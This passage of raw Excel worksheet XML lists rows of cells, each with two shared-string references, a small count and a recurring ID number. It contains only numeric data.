      </c>
      <c r="C21855">
        <v>0</v>
      </c>
      <c r="D21855">
        <v>1876</v>
      </c>
    </row>
    <row r="21856" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21856" t="s">
        <v>16231</v>
      </c>
      <c r="B21856" t="s">
        <v>16214</v>
      </c>
      <c r="C21856">
        <v>0</v>
      </c>
      <c r="D21856">
        <v>1876</v>
      </c>
    </row>
    <row r="21857" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21857" t="s">
        <v>16228</v>
      </c>
      <c r="B21857" t="s">
        <v>16215</v>
      </c>
      <c r="C21857">
        <v>1</v>
      </c>
      <c r="D21857">
        <v>1876</v>
      </c>
    </row>
    <row r="21858" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21858" t="s">
        <v>16231</v>
      </c>
      <c r="B21858" t="s">
        <v>16216</v>
      </c>
      <c r="C21858">
        <v>2</v>
      </c>
      <c r="D21858">
        <v>1876</v>
      </c>
    </row>
    <row r="21859" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21859" t="s">
        <v>16228</v>
      </c>
      <c r="B21859" t="s">
        <v>16217</v>
      </c>
      <c r="C21859">
        <v>8</v>
      </c>
      <c r="D21859">
        <v>1876</v>
      </c>
    </row>
    <row r="21860" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21860" t="s">
        <v>16231</v>
      </c>
      <c r="B21860" t="s">
        <v>16218</v>
      </c>
      <c r="C21860">
        <v>14</v>
      </c>
      <c r="D21860">
        <v>1876</v>
      </c>
    </row>
    <row r="21861" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21861" t="s">
        <v>16229</v>
      </c>
      <c r="B21861" t="s">
        <v>16219</v>
      </c>
      <c r="C21861">
        <v>0</v>
      </c>
      <c r="D21861">
        <v>1876</v>
      </c>
    </row>
    <row r="21862" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21862" t="s">
        <v>16230</v>
      </c>
      <c r="B21862" t="s">
        <v>16220</v>
      </c>
      <c r="C21862">
        <v>0</v>
      </c>
      <c r="D21862">
        <v>1876</v>
      </c>
    </row>
    <row r="21863" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21863" t="s">
        <v>16229</v>
      </c>
      <c r="B21863" t="s">
        <v>16221</v>
      </c>
      <c r="C21863">
        <v>0</v>
      </c>
      <c r="D21863">
        <v>1876</v>
      </c>
    </row>
    <row r="21864" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21864" t="s">
        <v>16230</v>
      </c>
      <c r="B21864" t="s">
        <v>16222</v>
      </c>
      <c r="C21864">
        <v>0</v>
      </c>
      <c r="D21864">
        <v>1876</v>
      </c>
    </row>
    <row r="21865" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21865" t="s">
        <v>16223</v>
      </c>
      <c r="B21865" t="s">
        <v>16223</v>
      </c>
      <c r="C21865">
        <v>25</v>
      </c>
      <c r="D21865">
        <v>1876</v>
      </c>
    </row>
    <row r="21866" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21866" t="s">
        <v>16224</v>
      </c>
      <c r="B21866" t="s">
        <v>16224</v>
      </c>
      <c r="C21866">
        <v>1</v>
      </c>
      <c r="D21866">
        <v>1876</v>
      </c>
    </row>
    <row r="21867" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21867" t="s">
        <v>16228</v>
      </c>
      <c r="B21867" t="s">
        <v>16211</v>
      </c>
      <c r="C21867">
        <v>0</v>
      </c>
      <c r="D21867">
        <v>601</v>
      </c>
    </row>
    <row r="21868" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21868" t="s">
        <v>16231</v>
      </c>
      <c r="B21868" t="s">
        <v>16212</v>
      </c>
      <c r="C21868">
        <v>0</v>
      </c>
      <c r="D21868">
        <v>601</v>
      </c>
    </row>
    <row r="21869" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21869" t="s">
        <v>16228</v>
      </c>
      <c r="B21869" t="s">
        <v>16213</v>
      </c>
      <c r="C21869">
        <v>0</v>
      </c>
      <c r="D21869">
        <v>601</v>
      </c>
    </row>
    <row r="21870" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21870" t="s">
        <v>16231</v>
      </c>
      <c r="B21870" t="s">
        <v>16214</v>
      </c>
      <c r="C21870">
        <v>0</v>
      </c>
      <c r="D21870">
        <v>601</v>
      </c>
    </row>
    <row r="21871" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21871" t="s">
        <v>16228</v>
      </c>
      <c r="B21871" t="s">
        <v>16215</v>
      </c>
      <c r="C21871">
        <v>0</v>
      </c>
      <c r="D21871">
        <v>601</v>
      </c>
    </row>
    <row r="21872" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21872" t="s">
        <v>16231</v>
      </c>
      <c r="B21872" t="s">
        <v>16216</v>
      </c>
      <c r="C21872">
        <v>0</v>
      </c>
      <c r="D21872">
        <v>601</v>
      </c>
    </row>
    <row r="21873" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21873" t="s">
        <v>16228</v>
      </c>
      <c r="B21873" t="s">
        <v>16217</v>
      </c>
      <c r="C21873">
        <v>0</v>
      </c>
      <c r="D21873">
        <v>601</v>
      </c>
    </row>
    <row r="21874" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21874" t="s">
        <v>16231</v>
      </c>
      <c r="B21874" t="s">
        <v>16218</v>
      </c>
      <c r="C21874">
        <v>0</v>
      </c>
      <c r="D21874">
        <v>601</v>
      </c>
    </row>
    <row r="21875" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21875" t="s">
        <v>16229</v>
      </c>
      <c r="B21875" t="s">
        <v>16219</v>
      </c>
      <c r="C21875">
        <v>0</v>
      </c>
      <c r="D21875">
        <v>601</v>
      </c>
    </row>
    <row r="21876" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21876" t="s">
        <v>16230</v>
      </c>
      <c r="B21876" t="s">
        <v>16220</v>
      </c>
      <c r="C21876">
        <v>0</v>
      </c>
      <c r="D21876">
        <v>601</v>
      </c>
    </row>
    <row r="21877" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21877" t="s">
        <v>16229</v>
      </c>
      <c r="B21877" t="s">
        <v>16221</v>
      </c>
      <c r="C21877">
        <v>0</v>
      </c>
      <c r="D21877">
        <v>601</v>
      </c>
    </row>
    <row r="21878" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21878" t="s">
        <v>16230</v>
      </c>
      <c r="B21878" t="s">
        <v>16222</v>
      </c>
      <c r="C21878">
        <v>0</v>
      </c>
      <c r="D21878">
        <v>601</v>
      </c>
    </row>
    <row r="21879" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21879" t="s">
        <v>16223</v>
      </c>
      <c r="B21879" t="s">
        <v>16223</v>
      </c>
      <c r="C21879">
        <v>0</v>
      </c>
      <c r="D21879">
        <v>601</v>
      </c>
    </row>
    <row r="21880" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21880" t="s">
        <v>16224</v>
      </c>
      <c r="B21880" t="s">
        <v>16224</v>
      </c>
      <c r="C21880">
        <v>0</v>
      </c>
      <c r="D21880">
        <v>601</v>
      </c>
    </row>
    <row r="21881" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21881" t="s">
        <v>16228</v>
      </c>
      <c r="B21881" t="s">
        <v>16215</v>
      </c>
      <c r="C21881">
        <v>1</v>
      </c>
      <c r="D21881">
        <v>601</v>
      </c>
    </row>
    <row r="21882" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21882" t="s">
        <v>16231</v>
      </c>
      <c r="B21882" t="s">
        <v>16216</v>
      </c>
      <c r="C21882">
        <v>1</v>
      </c>
      <c r="D21882">
        <v>601</v>
      </c>
    </row>
    <row r="21883" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21883" t="s">
        <v>16229</v>
      </c>
      <c r="B21883" t="s">
        <v>16219</v>
      </c>
      <c r="C21883">
        <v>2</v>
      </c>
      <c r="D21883">
        <v>601</v>
      </c>
    </row>
    <row r="21884" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21884" t="s">
        <v>16223</v>
      </c>
      <c r="B21884" t="s">
        <v>16223</v>
      </c>
      <c r="C21884">
        <v>2</v>
      </c>
      <c r="D21884">
        <v>601</v>
      </c>
    </row>
    <row r="21885" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21885" t="s">
        <v>16231</v>
      </c>
      <c r="B21885" t="s">
        <v>16216</v>
      </c>
      <c r="C21885">
        <v>2</v>
      </c>
      <c r="D21885">
        <v>2670</v>
      </c>
    </row>
    <row r="21886" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21886" t="s">
        <v>16228</v>
      </c>
      <c r="B21886" t="s">
        <v>16217</v>
      </c>
      <c r="C21886">
        <v>0</v>
      </c>
      <c r="D21886">
        <v>2670</v>
      </c>
    </row>
    <row r="21887" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21887" t="s">
        <v>16228</v>
      </c>
      <c r="B21887" t="s">
        <v>16211</v>
      </c>
      <c r="C21887">
        <v>0</v>
      </c>
      <c r="D21887">
        <v>5723</v>
      </c>
    </row>
    <row r="21888" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21888" t="s">
        <v>16231</v>
      </c>
      <c r="B21888" t="s">
        <v>16212</v>
      </c>
      <c r="C21888">
        <v>0</v>
      </c>
      <c r="D21888">
        <v>5723</v>
      </c>
    </row>
    <row r="21889" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21889" t="s">
        <v>16228</v>
      </c>
      <c r="B21889" t="s">
        <v>16213</v>
      </c>
      <c r="C21889">
        <v>0</v>
      </c>
      <c r="D21889">
        <v>5723</v>
      </c>
    </row>
    <row r="21890" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21890" t="s">
        <v>16231</v>
      </c>
      <c r="B21890" t="s">
        <v>16214</v>
      </c>
      <c r="C21890">
        <v>0</v>
      </c>
      <c r="D21890">
        <v>5723</v>
      </c>
    </row>
    <row r="21891" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21891" t="s">
        <v>16228</v>
      </c>
      <c r="B21891" t="s">
        <v>16215</v>
      </c>
      <c r="C21891">
        <v>0</v>
      </c>
      <c r="D21891">
        <v>5723</v>
      </c>
    </row>
    <row r="21892" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21892" t="s">
        <v>16231</v>
      </c>
      <c r="B21892" t="s">
        <v>16216</v>
      </c>
      <c r="C21892">
        <v>2</v>
      </c>
      <c r="D21892">
        <v>5723</v>
      </c>
    </row>
    <row r="21893" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21893" t="s">
        <v>16228</v>
      </c>
      <c r="B21893" t="s">
        <v>16217</v>
      </c>
      <c r="C21893">
        <v>2</v>
      </c>
      <c r="D21893">
        <v>5723</v>
      </c>
    </row>
    <row r="21894" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21894" t="s">
        <v>16231</v>
      </c>
      <c r="B21894" t="s">
        <v>16218</v>
      </c>
      <c r="C21894">
        <v>1</v>
      </c>
      <c r="D21894">
        <v>5723</v>
      </c>
    </row>
    <row r="21895" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21895" t="s">
        <v>16229</v>
      </c>
      <c r="B21895" t="s">
        <v>16219</v>
      </c>
      <c r="C21895">
        <v>0</v>
      </c>
      <c r="D21895">
        <v>5723</v>
      </c>
    </row>
    <row r="21896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21896" t="s">
        <v>16230</v>
      </c>
      <c r="B21896" t="s">
        <v>16220</v>
      </c>
      <c r="C21896">
        <v>0</v>
      </c>
      <c r="D21896">
        <v>5723</v>
      </c>
    </row>
    <row r="21897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21897" t="s">
        <v>16229</v>
      </c>
      <c r="B21897" t="s">
        <v>16221</v>
      </c>
      <c r="C21897">
        <v>4</v>
      </c>
      <c r="D21897">
        <v>5723</v>
      </c>
    </row>
    <row r="21898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21898" t="s">
        <v>16230</v>
      </c>
      <c r="B21898" t="s">
        <v>16222</v>
      </c>
      <c r="C21898">
        <v>2</v>
      </c>
      <c r="D21898">
        <v>5723</v>
      </c>
    </row>
    <row r="21899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21899" t="s">
        <v>16223</v>
      </c>
      <c r="B21899" t="s">
        <v>16223</v>
      </c>
      <c r="C21899">
        <v>26</v>
      </c>
      <c r="D21899">
        <v>5723</v>
      </c>
    </row>
    <row r="21900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21900" t="s">
        <v>16224</v>
      </c>
      <c r="B21900" t="s">
        <v>16224</v>
      </c>
      <c r="C21900">
        <v>1</v>
      </c>
      <c r="D21900">
        <v>5723</v>
      </c>
    </row>
    <row r="21901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21901" t="s">
        <v>16228</v>
      </c>
      <c r="B21901" t="s">
        <v>16211</v>
      </c>
      <c r="C21901">
        <v>0</v>
      </c>
      <c r="D21901">
        <v>5799</v>
      </c>
    </row>
    <row r="21902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21902" t="s">
        <v>16231</v>
      </c>
      <c r="B21902" t="s">
        <v>16212</v>
      </c>
      <c r="C21902">
        <v>0</v>
      </c>
      <c r="D21902">
        <v>5799</v>
      </c>
    </row>
    <row r="21903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21903" t="s">
        <v>16228</v>
      </c>
      <c r="B21903" t="s">
        <v>16213</v>
      </c>
      <c r="C21903">
        <v>0</v>
      </c>
      <c r="D21903">
        <v>5799</v>
      </c>
    </row>
    <row r="21904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21904" t="s">
        <v>16231</v>
      </c>
      <c r="B21904" t="s">
        <v>16214</v>
      </c>
      <c r="C21904">
        <v>0</v>
      </c>
      <c r="D21904">
        <v>5799</v>
      </c>
    </row>
    <row r="21905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21905" t="s">
        <v>16228</v>
      </c>
      <c r="B21905" t="s">
        <v>16215</v>
      </c>
      <c r="C21905">
        <v>2</v>
      </c>
      <c r="D21905">
        <v>5799</v>
      </c>
    </row>
    <row r="21906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21906" t="s">
        <v>16231</v>
      </c>
      <c r="B21906" t="s">
        <v>16216</v>
      </c>
      <c r="C21906">
        <v>1</v>
      </c>
      <c r="D21906">
        <v>5799</v>
      </c>
    </row>
    <row r="21907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21907" t="s">
        <v>16228</v>
      </c>
      <c r="B21907" t="s">
        <v>16217</v>
      </c>
      <c r="C21907">
        <v>0</v>
      </c>
      <c r="D21907">
        <v>5799</v>
      </c>
    </row>
    <row r="21908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21908" t="s">
        <v>16231</v>
      </c>
      <c r="B21908" t="s">
        <v>16218</v>
      </c>
      <c r="C21908">
        <v>0</v>
      </c>
      <c r="D21908">
        <v>5799</v>
      </c>
    </row>
    <row r="21909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21909" t="s">
        <v>16229</v>
      </c>
      <c r="B21909" t="s">
        <v>16219</v>
      </c>
      <c r="C21909">
        <v>0</v>
      </c>
      <c r="D21909">
        <v>5799</v>
      </c>
    </row>
    <row r="21910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21910" t="s">
        <v>16230</v>
      </c>
      <c r="B21910" t="s">
        <v>16220</v>
      </c>
      <c r="C21910">
        <v>0</v>
      </c>
      <c r="D21910">
        <v>5799</v>
      </c>
    </row>
    <row r="21911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21911" t="s">
        <v>16229</v>
      </c>
      <c r="B21911" t="s">
        <v>16221</v>
      </c>
      <c r="C21911">
        <v>5</v>
      </c>
      <c r="D21911">
        <v>5799</v>
      </c>
    </row>
    <row r="21912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21912" t="s">
        <v>16230</v>
      </c>
      <c r="B21912" t="s">
        <v>16222</v>
      </c>
      <c r="C21912">
        <v>0</v>
      </c>
      <c r="D21912">
        <v>5799</v>
      </c>
    </row>
    <row r="21913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21913" t="s">
        <v>16223</v>
      </c>
      <c r="B21913" t="s">
        <v>16223</v>
      </c>
      <c r="C21913">
        <v>22</v>
      </c>
      <c r="D21913">
        <v>5799</v>
      </c>
    </row>
    <row r="21914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21914" t="s">
        <v>16224</v>
      </c>
      <c r="B21914" t="s">
        <v>16224</v>
      </c>
      <c r="C21914">
        <v>0</v>
      </c>
      <c r="D21914">
        <v>5799</v>
      </c>
    </row>
    <row r="21915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21915" t="s">
        <v>16223</v>
      </c>
      <c r="B21915" t="s">
        <v>16223</v>
      </c>
      <c r="C21915">
        <v>28</v>
      </c>
      <c r="D21915">
        <v>5799</v>
      </c>
    </row>
    <row r="21916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21916" t="s">
        <v>16228</v>
      </c>
      <c r="B21916" t="s">
        <v>16211</v>
      </c>
      <c r="C21916">
        <v>0</v>
      </c>
      <c r="D21916">
        <v>4881</v>
      </c>
    </row>
    <row r="21917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21917" t="s">
        <v>16231</v>
      </c>
      <c r="B21917" t="s">
        <v>16212</v>
      </c>
      <c r="C21917">
        <v>0</v>
      </c>
      <c r="D21917">
        <v>4881</v>
      </c>
    </row>
    <row r="21918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21918" t="s">
        <v>16228</v>
      </c>
      <c r="B21918" t="s">
        <v>16213</v>
      </c>
      <c r="C21918">
        <v>0</v>
      </c>
      <c r="D21918">
        <v>4881</v>
      </c>
    </row>
    <row r="21919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21919" t="s">
        <v>16231</v>
      </c>
      <c r="B21919" t="s">
        <v>16214</v>
      </c>
      <c r="C21919">
        <v>0</v>
      </c>
      <c r="D21919">
        <v>4881</v>
      </c>
    </row>
    <row r="21920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21920" t="s">
        <v>16228</v>
      </c>
      <c r="B21920" t="s">
        <v>16215</v>
      </c>
      <c r="C21920">
        <v>0</v>
      </c>
      <c r="D21920">
        <v>4881</v>
      </c>
    </row>
    <row r="21921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21921" t="s">
        <v>16231</v>
      </c>
      <c r="B21921" t="s">
        <v>16216</v>
      </c>
      <c r="C21921">
        <v>1</v>
      </c>
      <c r="D21921">
        <v>4881</v>
      </c>
    </row>
    <row r="21922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21922" t="s">
        <v>16228</v>
      </c>
      <c r="B21922" t="s">
        <v>16217</v>
      </c>
      <c r="C21922">
        <v>0</v>
      </c>
      <c r="D21922">
        <v>4881</v>
      </c>
    </row>
    <row r="21923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21923" t="s">
        <v>16231</v>
      </c>
      <c r="B21923" t="s">
        <v>16218</v>
      </c>
      <c r="C21923">
        <v>4</v>
      </c>
      <c r="D21923">
        <v>4881</v>
      </c>
    </row>
    <row r="21924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21924" t="s">
        <v>16229</v>
      </c>
      <c r="B21924" t="s">
        <v>16219</v>
      </c>
      <c r="C21924">
        <v>0</v>
      </c>
      <c r="D21924">
        <v>4881</v>
      </c>
    </row>
    <row r="21925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21925" t="s">
        <v>16230</v>
      </c>
      <c r="B21925" t="s">
        <v>16220</v>
      </c>
      <c r="C21925">
        <v>0</v>
      </c>
      <c r="D21925">
        <v>4881</v>
      </c>
    </row>
    <row r="21926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21926" t="s">
        <v>16229</v>
      </c>
      <c r="B21926" t="s">
        <v>16221</v>
      </c>
      <c r="C21926">
        <v>0</v>
      </c>
      <c r="D21926">
        <v>4881</v>
      </c>
    </row>
    <row r="21927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21927" t="s">
        <v>16230</v>
      </c>
      <c r="B21927" t="s">
        <v>16222</v>
      </c>
      <c r="C21927">
        <v>5</v>
      </c>
      <c r="D21927">
        <v>4881</v>
      </c>
    </row>
    <row r="21928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21928" t="s">
        <v>16223</v>
      </c>
      <c r="B21928" t="s">
        <v>16223</v>
      </c>
      <c r="C21928">
        <v>6</v>
      </c>
      <c r="D21928">
        <v>4881</v>
      </c>
    </row>
    <row r="21929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21929" t="s">
        <v>16224</v>
      </c>
      <c r="B21929" t="s">
        <v>16224</v>
      </c>
      <c r="C21929">
        <v>1</v>
      </c>
      <c r="D21929">
        <v>4881</v>
      </c>
    </row>
    <row r="21930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21930" t="s">
        <v>16228</v>
      </c>
      <c r="B21930" t="s">
        <v>16211</v>
      </c>
      <c r="C21930">
        <v>0</v>
      </c>
      <c r="D21930">
        <v>5727</v>
      </c>
    </row>
    <row r="21931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21931" t="s">
        <v>16231</v>
      </c>
      <c r="B21931" t="s">
        <v>16212</v>
      </c>
      <c r="C21931">
        <v>0</v>
      </c>
      <c r="D21931">
        <v>5727</v>
      </c>
    </row>
    <row r="21932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21932" t="s">
        <v>16228</v>
      </c>
      <c r="B21932" t="s">
        <v>16213</v>
      </c>
      <c r="C21932">
        <v>0</v>
      </c>
      <c r="D21932">
        <v>5727</v>
      </c>
    </row>
    <row r="21933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21933" t="s">
        <v>16231</v>
      </c>
      <c r="B21933" t="s">
        <v>16214</v>
      </c>
      <c r="C21933">
        <v>0</v>
      </c>
      <c r="D21933">
        <v>5727</v>
      </c>
    </row>
    <row r="21934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21934" t="s">
        <v>16228</v>
      </c>
      <c r="B21934" t="s">
        <v>16215</v>
      </c>
      <c r="C21934">
        <v>0</v>
      </c>
      <c r="D21934">
        <v>5727</v>
      </c>
    </row>
    <row r="21935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21935" t="s">
        <v>16231</v>
      </c>
      <c r="B21935" t="s">
        <v>16216</v>
      </c>
      <c r="C21935">
        <v>2</v>
      </c>
      <c r="D21935">
        <v>5727</v>
      </c>
    </row>
    <row r="21936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21936" t="s">
        <v>16228</v>
      </c>
      <c r="B21936" t="s">
        <v>16217</v>
      </c>
      <c r="C21936">
        <v>6</v>
      </c>
      <c r="D21936">
        <v>5727</v>
      </c>
    </row>
    <row r="21937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21937" t="s">
        <v>16231</v>
      </c>
      <c r="B21937" t="s">
        <v>16218</v>
      </c>
      <c r="C21937">
        <v>3</v>
      </c>
      <c r="D21937">
        <v>5727</v>
      </c>
    </row>
    <row r="21938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21938" t="s">
        <v>16229</v>
      </c>
      <c r="B21938" t="s">
        <v>16219</v>
      </c>
      <c r="C21938">
        <v>0</v>
      </c>
      <c r="D21938">
        <v>5727</v>
      </c>
    </row>
    <row r="21939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21939" t="s">
        <v>16230</v>
      </c>
      <c r="B21939" t="s">
        <v>16220</v>
      </c>
      <c r="C21939">
        <v>3</v>
      </c>
      <c r="D21939">
        <v>5727</v>
      </c>
    </row>
    <row r="21940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21940" t="s">
        <v>16229</v>
      </c>
      <c r="B21940" t="s">
        <v>16221</v>
      </c>
      <c r="C21940">
        <v>17</v>
      </c>
      <c r="D21940">
        <v>5727</v>
      </c>
    </row>
    <row r="21941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21941" t="s">
        <v>16230</v>
      </c>
      <c r="B21941" t="s">
        <v>16222</v>
      </c>
      <c r="C21941">
        <v>22</v>
      </c>
      <c r="D21941">
        <v>5727</v>
      </c>
    </row>
    <row r="21942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21942" t="s">
        <v>16223</v>
      </c>
      <c r="B21942" t="s">
        <v>16223</v>
      </c>
      <c r="C21942">
        <v>24</v>
      </c>
      <c r="D21942">
        <v>5727</v>
      </c>
    </row>
    <row r="21943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21943" t="s">
        <v>16224</v>
      </c>
      <c r="B21943" t="s">
        <v>16224</v>
      </c>
      <c r="C21943">
        <v>1</v>
      </c>
      <c r="D21943">
        <v>5727</v>
      </c>
    </row>
    <row r="21944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21944" t="s">
        <v>16228</v>
      </c>
      <c r="B21944" t="s">
        <v>16211</v>
      </c>
      <c r="C21944">
        <v>0</v>
      </c>
      <c r="D21944">
        <v>5133</v>
      </c>
    </row>
    <row r="21945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21945" t="s">
        <v>16231</v>
      </c>
      <c r="B21945" t="s">
        <v>16212</v>
      </c>
      <c r="C21945">
        <v>0</v>
      </c>
      <c r="D21945">
        <v>5133</v>
      </c>
    </row>
    <row r="21946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21946" t="s">
        <v>16228</v>
      </c>
      <c r="B21946" t="s">
        <v>16213</v>
      </c>
      <c r="C21946">
        <v>0</v>
      </c>
      <c r="D21946">
        <v>5133</v>
      </c>
    </row>
    <row r="21947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21947" t="s">
        <v>16231</v>
      </c>
      <c r="B21947" t="s">
        <v>16214</v>
      </c>
      <c r="C21947">
        <v>0</v>
      </c>
      <c r="D21947">
        <v>5133</v>
      </c>
    </row>
    <row r="21948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21948" t="s">
        <v>16228</v>
      </c>
      <c r="B21948" t="s">
        <v>16215</v>
      </c>
      <c r="C21948">
        <v>0</v>
      </c>
      <c r="D21948">
        <v>5133</v>
      </c>
    </row>
    <row r="21949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21949" t="s">
        <v>16231</v>
      </c>
      <c r="B21949" t="s">
        <v>16216</v>
      </c>
      <c r="C21949">
        <v>1</v>
      </c>
      <c r="D21949">
        <v>5133</v>
      </c>
    </row>
    <row r="21950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21950" t="s">
        <v>16228</v>
      </c>
      <c r="B21950" t="s">
        <v>16217</v>
      </c>
      <c r="C21950">
        <v>1</v>
      </c>
      <c r="D21950">
        <v>5133</v>
      </c>
    </row>
    <row r="21951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21951" t="s">
        <v>16231</v>
      </c>
      <c r="B21951" t="s">
        <v>16218</v>
      </c>
      <c r="C21951">
        <v>1</v>
      </c>
      <c r="D21951">
        <v>5133</v>
      </c>
    </row>
    <row r="21952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21952" t="s">
        <v>16229</v>
      </c>
      <c r="B21952" t="s">
        <v>16219</v>
      </c>
      <c r="C21952">
        <v>0</v>
      </c>
      <c r="D21952">
        <v>5133</v>
      </c>
    </row>
    <row r="21953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21953" t="s">
        <v>16230</v>
      </c>
      <c r="B21953" t="s">
        <v>16220</v>
      </c>
      <c r="C21953">
        <v>0</v>
      </c>
      <c r="D21953">
        <v>5133</v>
      </c>
    </row>
    <row r="21954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21954" t="s">
        <v>16229</v>
      </c>
      <c r="B21954" t="s">
        <v>16221</v>
      </c>
      <c r="C21954">
        <v>0</v>
      </c>
      <c r="D21954">
        <v>5133</v>
      </c>
    </row>
    <row r="21955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21955" t="s">
        <v>16230</v>
      </c>
      <c r="B21955" t="s">
        <v>16222</v>
      </c>
      <c r="C21955">
        <v>0</v>
      </c>
      <c r="D21955">
        <v>5133</v>
      </c>
    </row>
    <row r="21956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21956" t="s">
        <v>16223</v>
      </c>
      <c r="B21956" t="s">
        <v>16223</v>
      </c>
      <c r="C21956">
        <v>26</v>
      </c>
      <c r="D21956">
        <v>5133</v>
      </c>
    </row>
    <row r="21957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21957" t="s">
        <v>16224</v>
      </c>
      <c r="B21957" t="s">
        <v>16224</v>
      </c>
      <c r="C21957">
        <v>0</v>
      </c>
      <c r="D21957">
        <v>5133</v>
      </c>
    </row>
    <row r="21958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21958" t="s">
        <v>16228</v>
      </c>
      <c r="B21958" t="s">
        <v>16211</v>
      </c>
      <c r="C21958">
        <v>0</v>
      </c>
      <c r="D21958">
        <v>1660</v>
      </c>
    </row>
    <row r="21959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21959" t="s">
        <v>16231</v>
      </c>
      <c r="B21959" t="s">
        <v>16212</v>
      </c>
      <c r="C21959">
        <v>0</v>
      </c>
      <c r="D21959">
        <v>1660</v>
      </c>
    </row>
    <row r="21960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21960" t="s">
        <v>16228</v>
      </c>
      <c r="B21960" t="s">
        <v>16213</v>
